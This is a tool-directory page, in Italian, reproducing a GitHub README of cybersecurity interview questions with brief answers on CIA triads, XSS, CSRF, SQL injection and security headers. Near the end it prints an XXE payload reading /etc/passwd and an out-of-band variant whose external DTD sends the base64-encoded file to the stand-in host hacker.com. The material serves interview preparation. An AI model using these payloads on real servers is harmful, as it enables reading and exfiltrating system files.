Skip to content
KitploitKITPLOIT
StrumentiExploitsBlog
Log in
Invia
StrumentiExploitsBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
Interview_Tips — Riepilogo delle domande di colloquio sulla sicurezza informatica che ho affrontato, spero sia d'aiuto. | Kitploit
Strumenti/GitHubGitHub/jigerjain/interview_tips
Sicurezza WebSicurezza di ReteCrittografiaSicurezza CloudApprendimento e FormazioneRisorse CuratePercorsi e CorsiBinary Exploitation
GitHubjigerjain/interview_tips

Interview_Tips

Riepilogo delle domande di colloquio sulla sicurezza informatica che ho affrontato, spero sia d'aiuto.

Vedi Repository
6917216 anni faRevisionato da Kitploit

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
Condividi

Consigli per i Colloqui (Sicurezza Informatica)

Questa pagina è un riepilogo dei colloqui che ho affrontato, coprendo una discreta varietà di ruoli, ricevendo diversi rifiuti, ma imparando da ogni colloquio, raccogliendo feedback costruttivi e andando avanti. Spero che queste domande/consigli possano esserti utili.

I ruoli che generalmente copre sono i seguenti:

  • Tirocinante in Cybersecurity
  • Tirocinante in Penetration Testing / Red Team
  • Tirocinante in Sicurezza Web/Applicazioni Web
  • Tirocinante in Sicurezza dei Prodotti
  • Tirocinante in Sicurezza delle Infrastrutture

Consiglio rapido:

  • Rivedi il tuo curriculum e poniti domande ad esso correlate in anticipo
  • Se non conosci una domanda/concetto, non girare intorno all'argomento, comunica che puoi impararlo se ti viene dato un ambiente in cui lavorare
    Non puoi sapere tutto, sii umile nell'accettare se hai risposto qualcosa di sbagliato o se hai bisogno di chiarimenti
  • Prepara una breve bio su di te in anticipo per presentarti
  • Sii sicuro del tuo obiettivo finale e del perché la sicurezza informatica?
  • Infine, chiedi un feedback alla fine del colloquio, perché: aiuta a conoscere e colmare le lacune della tua attuale conoscenza nella sicurezza informatica

Ho cercato di annotare qui di seguito tutte le possibili domande che ho incontrato e ho fornito risposte per alcune. Per il resto puoi cercare su Google le risposte specifiche e se vuoi approfondire. Inoltre, alla fine ci sono alcuni riferimenti, dai un'occhiata. Sono stati davvero utili.

Mi piacerebbe aggiungere altre domande man mano che vado avanti e controllo i miei appunti, ma apprezzerei se potessi darmi un feedback costruttivo contattandomi via [email protected]. Se incontri qualcosa che non è coperto qui, sentiti libero di condividerlo.

Domande comuni

  1. Triadi di sicurezza:

Cos'è la CIA?

  • Riservatezza
  • Integrità
  • Disponibilità

Cos'è AAA?

  • Autenticazione
  • Autorizzazione
  • Accounting
  1. Differenza tra Minaccia, Vulnerabilità, Exploit e Rischio e come questi sono correlati agli Asset
  • Minaccia:
    Una minaccia è ciò contro cui stiamo cercando di proteggerci
  • Vulnerabilità:
    Una vulnerabilità è una debolezza o una lacuna nei nostri sforzi di protezione
  • Exploit:
    Un'abilità/programma (può essere un software o una capacità di ingegneria sociale) sviluppato per attaccare un asset sfruttando una vulnerabilità
  • Rischio:
    Il rischio è l'intersezione di asset, minacce e vulnerabilità
  • Asset:
    Un asset è ciò che stiamo cercando di proteggere
  1. Cos'è l'IAM e perché viene utilizzato?
    L'IAM è la Gestione delle Identità e degli Accessi (Identity Access Management) utilizzata per separare ruoli e responsabilità all'interno di un'organizzazione. È un elemento critico nella sicurezza. Aiuta a mantenere la sicurezza dei livelli di accesso e i privilegi

Sicurezza in generale

Fasi di un attacco di intrusione di rete:

  • Ricognizione / Raccolta di informazioni
  • Ottenere l'accesso necessario
  • Mantenere l'accesso
  • Coprire le tracce (eliminare log, backdoor e nascondere tutti i controlli)

Sicurezza delle Applicazioni Web

  1. Domande comuni:
  • OWASP Top 10

  • Cos'è l'XSS (Cross-site Scripting)

    • Esercitati con XSS su: [https://xss-game.appspot.com/]
    • Come contrastare l'XSS: Utilizza brevemente un'appropriata validazione degli input
    • Cerca l'intestazione CSP (Content-Security-Policy)
    • Diversi tipi di XSS: Reflected, Stored e DOM-based
    • Quali sono le sorgenti (sources) e i sink nel DOM che potrebbero portare a XSS:
      [https://www.netsparker.com/blog/web-security/dom-based-cross-site-scripting-vulnerability/]
  • Cos'è il CSRF Questa è la domanda più azzeccata che ogni intervistatore amerebbe fare
    Consiglio rapido: Sii breve, se ti viene chiesto, spiega solo allora l'intera storia

    Il Cross-Site Request Forgery (CSRF) è un attacco che costringe un utente finale a eseguire azioni indesiderate su un'applicazione web in cui è attualmente autenticato. Gli attacchi CSRF prendono di mira specificamente le richieste che modificano lo stato, non il furto di dati, poiché l'attaccante non ha modo di vedere la risposta alla richiesta contraffatta. Con un piccolo aiuto dell'ingegneria sociale (come l'invio di un link via email o chat), un attaccante può ingannare gli utenti di un'applicazione web spingendoli a eseguire azioni scelte dall'attaccante. Se la vittima è un utente normale, un attacco CSRF riuscito può costringere l'utente a eseguire richieste di modifica dello stato come trasferire fondi, cambiare il proprio indirizzo email e così via. Se la vittima è un account amministrativo, il CSRF può compromettere l'intera applicazione web.

  • Come contrastare il CSRF:
    Utilizzare token Anti-CSRF
    Utilizzare la same-origin policy
    Utilizzo dell'intestazione Referrer

  • Cos'è la codifica HTML/URL

  • Il protocollo HTTP è stateless?
    HTTP è intrinsecamente un protocollo stateless, tuttavia il server utilizza i cookie per renderlo stateful

  • Quali sono i tipi di injection: SQL, Command, OS

  • Come contrastare le SQL injection
    Utilizzare query parametrizzate e stored procedure

  1. Controlla le intestazioni che aiutano a fornire sicurezza (Controlla gli URL e leggi il contenuto, ti aiuterà a costruire le tue basi):
  • CSP (Content-Security Policy) [https://developer.mozilla.org/en-US/docs/Web/HTTP/Headers/Content-Security-Policy]
    [https://www.html5rocks.com/en/tutorials/security/content-security-policy/]
  • CORS (Cross-Origin Resource Sharing) [https://developer.mozilla.org/en-US/docs/Web/HTTP/CORS]
  • Same-Origin policy [https://developer.mozilla.org/en-US/docs/Web/Security/Same-origin_policy]
  1. Ci sarebbero scenari rari in cui un intervistatore potrebbe chiedere queste cose; ne ho incontrate alcune nelle fasi successive di alcuni colloqui e ho pensato di menzionarle:
  • Cos'è XXE (XML External Entities)?
    L'iniezione di entità esterne XML (nota anche come XXE) è una vulnerabilità di sicurezza web che consente a un attaccante di interferire con l'elaborazione dei dati XML di un'applicazione. Spesso consente a un attaccante di visualizzare file sul filesystem del server applicativo e di interagire con qualsiasi backend o sistema esterno a cui l'applicazione stessa può accedere.
    Controlla questo [https://portswigger.net/web-security/xxe]
    Es:
    <?xml version="1.0" encoding="UTF-8"?>    
    <!DOCTYPE foo [ <!ENTITY xxe SYSTEM "file:///etc/passwd"> ]>     
    <stockCheck><productId>&xxe;</productId></stockCheck> 
    
    In alcune situazioni, un attaccante può escalare un attacco XXE per compromettere il server sottostante o altre infrastrutture backend, sfruttando la vulnerabilità XXE per eseguire attacchi di server-side request forgery (SSRF).
  • Out-Of-Band - utilizzando le entità XML, i dati dal server possono essere catturati e inviati a hacker.com (nessun output dal server richiesto)

Da iniettare: document.xml

<!DOCTYPE root [
    <!ENTITY % remote SYSTEM "http://hacker.com/evil.dtd">
    %remote; %intern; %xxe;
]>
<root>&xxe;</root> - puoi cambiare l'entità xxe in entità generale

Host esterno: http://hacker.com/evil.dtd

<!ENTITY % payl SYSTEM "php://filter/read=convert.base64-encode/resource=file:///etc/passwd">
<!ENTITY % intern "<!ENTITY &#37; xxe SYSTEM 'http://hacker.com/result-is?%payl;'>">
                    --- OPPURE ---
<!ENTITY % intern "<!ENTITY &#37; xxe SYSTEM 'file://%payl;'>"> - considera error-based

Rif: [https://phonexicum.github.io/infosec/xxe.html]

  • Cos'è un attacco SSRF (Server Side Request Forgery) Potrebbe essere usato per fare pivot nella rete interna
  • Come si protegge un'architettura web a 3 livelli
  • Cos'è Kerberos https://www.varonis.com/blog/kerberos-authentication-explained/
  • Cos'è la Gestione dei Segreti (Secret Management) e i Vault https://www.hashicorp.com/resources/introduction-vault-whiteboard-armon-dadgar
Scarica lo strumento